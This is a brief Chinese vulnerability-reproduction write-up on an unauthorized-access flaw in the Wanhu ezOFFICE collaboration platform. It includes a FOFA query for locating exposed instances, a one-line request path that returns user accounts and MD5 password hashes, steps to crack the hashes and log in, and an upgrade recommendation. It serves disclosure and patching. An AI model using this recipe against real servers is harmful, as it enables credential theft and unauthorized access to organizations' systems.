万户协同办公平台未授权访问漏洞复现

前言

此文章仅用于技术交流，严禁用于对外发起恶意攻击！！！

---

一、产品简介

万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能，它以工作流引擎为底层服务，以通讯沟通平台为交流手段，以门户自定义平台为信息推送显示平台，为用户提供集成的协同工作环境。

二、漏洞描述

该平台存在未授权访问漏洞，攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码

三、影响范围

version <=12.4.12.25

四、复现环境

FOFA：title=“万户ezOFFICE”

五、漏洞复现

1.POC

IP：port/defaultroot/evoInterfaceServlet?paramType=user

2.拿到MD5去解密

3.登录成功

六、修复建议

该漏洞仅影响较低版本，目前厂家已修复，可前往官网升级

http://www.whir.net/